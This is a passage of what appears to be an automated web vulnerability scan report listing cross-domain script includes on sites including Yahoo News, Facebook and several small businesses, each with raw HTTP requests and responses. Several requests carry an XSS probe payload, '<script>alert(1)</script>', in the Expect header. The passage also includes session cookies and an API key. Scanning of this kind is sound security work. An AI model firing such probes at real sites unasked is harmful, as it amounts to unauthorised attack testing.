Last-Modified: Fri, 04 Mar 2011 18:44:10 GMT
ETag: "5662-4d7132fa"
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Mon, 02 May 2011 23:33:14 GMT
Date: Sun, 01 May 2011 23:33:14 GMT
Connection: close
Content-Length: 22114

var wpTiles = {
   tools : {
       log : function (a) { if (console) { console.log(a); } },
       commercialNode : (typeof commercialNode !== 'undefined') ? commercialNode:'technology',
       urlCheck : (typeof
...[SNIP]...
<img src="http://altfarm.mediaplex.com/ad/tr/14302-93014-2151-0?mpt='+wpTiles.tools.ord+'" alt="" style="display:none;width:1px;height:1px;border:0" /><script src="http://puma.vizu.com/cdn/00/00/06/21/tracking_only.js?adid=logo;siteid=washingtonpost;" type="text/javascript"></script>
...[SNIP]...
24.9. http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.yahoo.com
Path:   /s/prweb/20110427/bs_prweb/prweb5276794

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /s/prweb/20110427/bs_prweb/prweb5276794 HTTP/1.1
Host: news.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:12 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: MwPhCom_degraded_status=false; path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 2
Proxy-Connection: close
Server: YTS/1.19.4

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">

<!--
...[SNIP]...
<!-- end: #doc4 -->


<script type="text/javascript" src="http://l.yimg.com/d/combo?yui/2.7.0/build/yahoo/yahoo-min.js&yui/2.7.0/build/event/event-min.js&yui/2.7.0/build/dom/dom-min.js&yui/2.7.0/build/get/get-min.js&yui/2.7.0/build/animation/animation-min.js&yui/2.7.0/build/json/json-min.js&yui/2.7.0/build/connection/connection-min.js&yui/2.7.0/build/datasource/datasource-min.js&yui/2.7.0/build/selector/selector-min.js&yui/2.7.0/build/cookie/cookie-min.js&yui/2.7.0/build/container/container-min.js&media/m/infinite_browse/mw_infinite_browse_carousel-min-3870.js&yui/2.7.0/build/element/element-min.js&yui/2.7.0/build/carousel/carousel-min.js&news/p/story/generic/infinite-browse-carousel-ult-min-59548.js&uh/15/js/uh_rsa-1.0.9.js&news/p/common/generic/common_base_rollup-min-44697.js&news/p/common/generic/common_page_rollup-min-26267.js&media/m/location_widget/location_widget-min-22834.js&news/p/common/generic/filter-reload-local-viewer-filter_init-reload_init-min-38036.js&s5/miniassist_200912081429.js&news/p/common/generic/foundation/im-min-6761.js&news/p/common/generic/foundation/popup-min-12622.js&news/p/common/generic/im_init-min-12623.js&news/p/common/generic/popup_init-min-12623.js&news/p/story/generic/story-min-54515.js&news/p/story/generic/aska-min-44740.js&news/p/common/generic/yui3-min-36486.js&yui/2.7.0/build/imageloader/imageloader-min.js&yui/2.7.0/build/container/container_core-min.js&media/phugc/mwphcom_min_r1413.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://l.yimg.com/d/combo?media/m/infinite_browse/mw_infinite_browse-min-3638.js&media/m/infinite_browse/yui.widget.jsonabortable-min-3638.js&media/m/infinite_browse/yui.util.imageresizecrop-min-3378.js&media/m/social_buttons/social-buttons-easy-min-3950.js"></script>
...[SNIP]...
24.10. http://usjobsresource.com/3/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usjobsresource.com
Path:   /3/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /3/?s=31s-2100u HTTP/1.1
Host: usjobsresource.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15206


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
</script>
<script src="http://j.maxmind.com/app/geoip.js"></script>
...[SNIP]...
</script> <script id="mstag_tops" type="text/javascript" src="//flex.atdmt.com/mstag/site/7a8a3b31-6681-4d89-825a-d834c1016c24/mstag.js"></script>
...[SNIP]...
24.11. http://websiteprice.net/result/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /result/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /result/?id=65934 HTTP/1.1
Host: websiteprice.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Expires: Mon, 02 May 2011 02:12:54 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:14:04 GMT
Content-Length: 10437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</script>
<script type="text/javascript" src="http://resources.infolinks.com/js/infolinks_main.js"></script>
...[SNIP]...
24.12. http://www.24-7pressrelease.com/press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.24-7pressrelease.com
Path:   /press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php HTTP/1.1
Host: www.24-7pressrelease.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:39 GMT
Server: Apache
Vary: User-Agent
Set-Cookie: tf7sid=a9l3d80hrmsh2jf67cj61qtuj2; path=/; domain=.24-7pressrelease.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 37188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Press Release - The
...[SNIP]...
</script>
           <script type="text/javascript"
            src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
           </script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
24.13. http://www.apartmentsmart.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apartmentsmart.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.apartmentsmart.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=BH_8beo-zAEkAAAAMGYxMjg0NDItOTdmNy00NzVjLTlhNzItNjY2YjY5MzU4ZGYy0; expires=Sun, 10-Jul-2011 10:16:27 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:36:27 GMT
Content-Length: 23072

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en-US">
<head id="Head">
<!--**********************************************************************************-->
<!-- D
...[SNIP]...
<link rel="SHORTCUT ICON" href="/Portals/1/favicon.ico" /><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js" ></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
24.14. http://www.bluesplayer.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluesplayer.co.uk
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bluesplayer.co.uk
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:10:49 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=b7c32b2936f1354d9728de7d69c9cd94; path=/
Set-Cookie: filter=include; path=/
Set-Cookie: ctemplate=default; path=/
Set-Cookie: ctheme=dark-tube; path=/
Content-Type: text/html
Content-Length: 17593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
</script>
<script language="JavaScript" src="http://j.maxmind.com/app/country.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAjXmqKfpfzVw1zDgAulCjwhQv9s9k3vjdF3VnVffIVuZr3td7GBRTxuB90LGKAhbSGhxoJYCYQ5Fomw">
</script>
...[SNIP]...
<div style="position: absolute; margin-top: 96px; margin-left: 95px; height: 15px; width: 75px; padding-left: 10px; padding-top: 4px;">
<script type="text/javascript" src="http://widgets.amung.us/small.js"></script>
...[SNIP]...
24.15. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1 HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 01 May 2011 23:32:53 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 01 May 2011 23:32:53 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=WXEJ2N3KRNFIDB4U3SIR5VQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207579474; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=609658d5a1ebcf5618d05b23302f38b7; domain=business.att.com; path=/
X-Cache: MISS from 12.120.78.32
Via: 1.1 12.120.78.32:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
</h1>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
</script>
<script src="http://www.google.com/jsapi?key=ABQIAAAA5tdpImBf4eDcDKbLmSjk5xTUkbc6-RyEmhXHNETmcLgMd9n64RTmPO4_ao4eAxL3FEA8IPnbDDDvHQ" type="text/javascript"></script>
...[SNIP]...
24.16. http://www.clickinks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clickinks.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.clickinks.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Sun, 01 May 2011 23:49:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=2jo5f13os0ec3z2tqss0vx1o; path=/; HttpOnly
Set-Cookie: OEM=; expires=Tue, 01-May-2001 23:49:24 GMT; path=/
Set-Cookie: MachineToken=676c3038-3d1e-4a84-ba81-895ddded8034; expires=Thu, 01-May-2031 07:00:00 GMT; path=/
Set-Cookie: phiddenId=ccd47da2-cd93-4362-834c-c48883e55ec6; expires=Tue, 03-May-2011 07:00:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 105282


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Clickinks
...[SNIP]...
</a>
                   <script src="//upfront.thefind.com/scripts/main/utils-init-ajaxlib/upfront-badgeinit.js" type="text/javascript"></script>
...[SNIP]...
<!-- BEGIN HumanTag Monitor. DO NOT MOVE! MUST BE PLACED JUST BEFORE THE /BODY TAG --><script language='javascript' src='http://server.iad.liveperson.net/hc/92074166/x.js?cmd=file&file=chatScript3&site=92074166&&imageUrl=http://www.clickinks.com/images/VerticalNavigation/'></script>
...[SNIP]...
24.17. http://www.coolquiz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coolquiz.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.coolquiz.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 01 May 2011 23:35:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-type: text/html
Page-Completion-Status: Normal


                                                                       <html>
   <head><title>Page Not Found</title>
   </head>
   <style>
   
   body {background-color: FFFFFF;}
   .bg0 {padding:0p
...[SNIP]...
</table>

   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
24.18. http://www.crankyape.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crankyape.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.crankyape.com
Proxy-Connection: keep-alive
Referer: http://www.crankyape.com/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 02 May 2011 01:53:20 GMT
Content-Type: text/html
Expires: Sun, 01 May 2011 01:53:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDSARCDQAB=MKADMMGCLDEMBHOGIDLDIPPF; path=/
Vary: Accept-Encoding
Content-Length: 19683

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>Crankyape.com Bank repo rvs, motorcycles, snowmobiles, atvs, boats, trucks, trailers, go karts,
...[SNIP]...
</table>

<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
24.19. http://www.crankyape.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crankyape.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.crankyape.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 999 No Hacking
Server: WebKnight/2.1
Date: Sun, 01 May 2011 23:41:46 GMT
Content-Type: text/html; charset=windows-1252
Content-Length: 2420
Pragma: no-cache
Cache-control: no-cache
Expires: Sun, 01 May 2011 23:41:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</table>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
24.20. https://www.crankyape.com/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /default.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /default.asp?pg=DispSingleItem&ItemNumber=26361 HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: http://www.crankyape.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 02 May 2011 01:53:37 GMT
Content-Type: text/html
Expires: Sun, 01 May 2011 01:53:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 30879

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>Crankyape.com Insurance total loss rvs, motorcycles, atvs, snowmobiles, boats, trucks, trailers.
...[SNIP]...
</table>

<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
24.21. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110501_0700%26ssh%3D1121929261%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.70.50
X-Cnection: close
Date: Sun, 01 May 2011 23:32:34 GMT
Content-Length: 8636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/FGFAI5AC1WM.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
...[SNIP]...
24.22. http://www.febreze.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.febreze.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.febreze.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:22:53 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 556

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
</p>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...
24.23. http://www.greenhulk.net/forums/login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/login.php

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /forums/login.php?do=login HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/register.php
Cache-Control: max-age=0
Origin: http://www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gh_lastactivity=0; __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.2.10.1304319910
Content-Length: 222

vb_login_username=User+Name&vb_login_password_hint=Password&vb_login_password=&s=&securitytoken=guest&do=login&vb_login_md5password=d41d8cd98f00b204e9800998ecf8427e&vb_login_md5password_utf=d41d8cd98f
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:30:42 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:30:42 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_
...[SNIP]...
</script><script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...
24.24. http://www.greenhulk.net/forums/register.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/register.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/register.php HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/showthread.php?126285-Rear-boarding-step
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.1.10.1304319910

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:28:52 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:28:52 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:28:52 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:28:52 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35808

